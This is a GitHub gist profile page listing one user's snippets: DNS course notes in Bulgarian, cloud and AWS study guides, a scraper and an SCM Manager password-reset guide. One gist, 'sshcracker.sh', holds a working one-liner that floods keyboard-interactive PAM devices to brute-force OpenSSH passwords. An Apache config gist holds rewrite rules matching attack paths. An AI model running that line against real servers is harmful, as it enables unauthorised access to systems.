Skip to content

Instantly share code, notes, and snippets.

View miglen's full-sized avatar
👨‍💻

Miglen Evlogiev miglen

👨‍💻
View GitHub Profile

Libraries

  • jQuery - The de-facto library for the modern age. It makes things like HTML document traversal and manipulation, event handling, animation, and Ajax much simpler with an easy-to-use API that works across a multitude of browsers.
  • Backbone - Backbone.js gives structure to web applications by providing models with key-value binding and custom events, collections with a rich API of enumerable functions, views with declarative event handling, and connects it all to your existing API over a RESTful JSON interface.
  • AngularJS - Conventions based MVC framework for HTML5 apps.
  • Underscore - Underscore is a utility-belt library for JavaScript that provides a lot of the functional programming support that you would expect in Prototype.js (or Ruby), but without extending any of the built-in JavaScript objects.
  • lawnchair - Key/value store adapter for indexdb, localStorage
@miglen
miglen / CSCB411 - Операционни системи (Linux).md
Last active June 13, 2017 10:57
CSCB411 - Операционни системи (Linux)

Кой сървър предоставя DNS service?

  • BIND

В кой домейн се описват зоните за обратно търсене

  • in-addr.arpa

Primary DNS сървърите

Съхраняват образец на файла със зоната. Този файл може да бъде променян на компютъра, където е инсталиран.

Какво описват CNAME записите в DNS зоната?

@miglen
miglen / postbank.location.js
Created April 22, 2015 07:12
postbank.location.js
/*
Този скрипт е пълен с едни от най-забавните коментари на български.
Разработен е от някой от разработчиците на Iliyan.com за Пощенска банка.
Пазя го за да се смеем ако го променят в сайта.
Оригинална локация: https://www.postbank.bg/Applications/Locations/_inc/js/locations.js
*/
@miglen
miglen / httpd-proxy.conf
Created July 15, 2015 13:02
Web proxy filters and rewrites
# Source: http://whatever.truls.org/proxyfilters.text.shtml
RewriteEngine On
RewriteOptions inherit
RewriteLogLevel 5
RewriteCond %{REQUEST_URI}?%{QUERY_STRING} (.*)rewritefiltertest(\x20*)any(.*) [NC,OR]
RewriteCond %{REQUEST_URI}?%{QUERY_STRING} (.*)rewritefiltertest(\x20*)end[$|\?(.*)] [NC,OR]
RewriteCond %{REQUEST_URI}?%{QUERY_STRING} (.*)XXXXXXXXXXXXXXXXXXXXXXXXX(.*) [NC,OR]
RewriteCond %{REQUEST_URI}?%{QUERY_STRING} ^(.*/)?(\x20*)winnt/(\x20*)system32/(.*) [NC,OR]
@miglen
miglen / sshcracker.sh
Last active August 29, 2015 14:25
OpenSSH brute forcer
#!/bin/bash
# usage ./sshcracker.sh ssh-username ssh-host wordlist.file
#
ssh -l$1 -oKbdInteractiveDevices=`perl -e 'print "pam," x 10000'` $2
@miglen
miglen / jobsbg.py
Created August 26, 2015 07:25
Jobsbg viewcount
from BeautifulSoup import BeautifulSoup
import urllib2
import math
import re
# coding: utf-8
"""
Get job views from company postings in jobs.bg
"""
@miglen
miglen / reset_scmadmin_password.md
Last active December 20, 2023 10:53
How to reset your admin password in SCM Manager

How to reset the scmadmin (administrator) password in SCM Manager?

Recently I had some troubles in resetting the SCM Manager admin password and here's simply how to do it.

  1. Look for file users.xml where the users and passwords are stored. Usual locations:
/root/.scm/config/users.xml
/var/scm-server/conf/users.xml
$SCM_INSTALL_OR_HOME_DIR/config/users.xml
@miglen
miglen / arete.md
Last active June 23, 2018 10:11
Arete

This file contains links to online materials which I find useful for re-reading from time to time. I had started this initiative back in HP when created email list called Arete among my colleagues and spamming it with some useful materials on a regular basis. Since I left I wanted to continue sharing valuable content, here's why I have continued this here. Use the comments, to add more valuable stuff and never stop learning!

  • Bash academy - an initiative to promote and educate the bash shell language.
@miglen
miglen / clouds.md
Last active April 15, 2023 20:05
AWS & GCP explained in simple English

Amazon Web Services (AWS) & Google Cloud Platform (GCP) explained in simple English

This guide is only representative from my point of view and it may not be accurate and you should go on the official AWS & GCP websites for accurate and detailed information. It's initially inspired by AWS in simple English and GCP for AWS professionals. The idea is to compare both services, give simple one-line explanation and examples with other software that might have similiar capabilities. Comment below for suggestions.

Category Service AWS GCP Description It's like
Compute IaaS Amazon Elastic Compute Cloud (EC2) Google Compute Engine Type-1 virtual servers VMware ESXi, Citrix XenServer
  PaaS AWS Elastic Beanstalk Google App Engine Running your app on a platform
@miglen
miglen / aws-certification.md
Last active May 5, 2023 10:04
AWS Certification guide and notes on how to prepare for the aws associate certification architect, sysops and developer exams


AWS Certification notes

Those are my personal notes on AWS Solution Architect certification preparation. Hope you find them usefull.

To pass AWS certification, you should have:

  • Sound knowledge about most of the AWS services ( EC2, VPC, RDS, Cloudfront, S3, Route53 etc,)
  • Hands on experience with AWS services.